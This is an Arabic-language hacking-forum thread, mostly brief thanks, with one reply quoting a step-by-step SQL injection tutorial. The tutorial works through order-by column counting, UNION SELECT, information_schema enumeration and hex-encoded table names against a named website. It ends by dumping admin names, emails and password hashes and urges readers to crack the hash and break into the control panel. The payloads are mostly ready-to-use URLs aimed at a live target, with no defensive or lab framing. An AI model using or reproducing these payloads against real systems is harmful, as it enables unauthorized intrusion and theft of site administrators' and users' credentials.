ترتيب الخطوات في حقن قواعد البيانات SQL Injection

CODLegend · 23 أغسطس 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

شكرا أخي الكريم على الموضوع

ahmad156 · 23 أغسطس 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

شكرا

electrone1993 · 29 أغسطس 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

thanks; that was important for us

D7OMI · 11 سبتمبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

شكراً لك ي غالي ,

Soli0022 · 23 سبتمبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

شكرا اخي الكريم

ZiAD SAiD · 10 أكتوبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مجهود رائع

onelove55 · 23 أكتوبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

thank you

omar2 · 8 نوفمبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

:icon30:

KaLa$nikoV قال:
عنا موقع مصاب

نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

PHP:

order by 1-- order by 5-- order by 10-- order by 15--

لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا

PHP:

order by 1/*

يا نورع العين نرجع لمكانا

order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

PHP:

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

انتبه للناقص

الان لنعرف اصدار القاعده
نكتب

PHP:

version()

وهذه بعض الاوامر

database()
version()
user()

not end

الموضعوع لم ينتهي بعد

الان نضيف التالي للحقنه

PHP:

concat(table_name,0x3a,column_name,0x3a,table_schema)

و

PHP:

+from+information_schema.columns--

فتصبح

PHP:

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns--

الان نضيف الامر التالي

PHP:

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

PHP:

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار

الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده

زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه

بلزمنا الان الموقع الرائع وهو

PHP:

http://www.waraxe.us/sql-char-encoder.html

اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو

نوع التشفير هو

PHP:

MySql hex-encoded string

يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=

يعني هيك

PHP:

where+table_name=0x53757276657941646d696e73

الاستغلال

PHP:

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73--

ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها

الان خلينا نجمع الاستغلال

اسم الجدول

السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)

PHP:

;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;

PHP:

[CENTER]نجمعهم بالامر بصيرو [php] concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)

نركبه بالحقنه

PHP:

http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--

بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق

استفين ع التاخر هي الدرس بالفيديو .....

[/CENTER]

alluhaiby · 4 ديسمبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

جزاك الله خيرا

mojaweb0 · 30 ديسمبر 2013

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

لي المشاهدة

محمد الرويس · 21 يناير 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مششششكور

شوية معرصين · 18 مارس 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

ممتاز

kacem162004 · 28 مارس 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مشكوووووووووور أخي على الشرح

Jaza · 26 أبريل 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

فكيت ازممممة

بانوراما الحازمي · 13 مايو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

-

موضوع بطل ، تسلم يمينك اخوي

rmieng · 17 مايو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مشكووووووور والله يعطيك العافية

dr.naw · 21 مايو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مشكور

BeginSpy · 24 يونيو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

في ح عنده معلومات عن لغة البرمجة لقواعد البيانات Nosql

/*-+ · 26 يونيو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

.

ghost libya · 4 يوليو 2014

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection

مشكور ع الشرح الوافي

رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection شكرا أخي الكريم على الموضوع

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member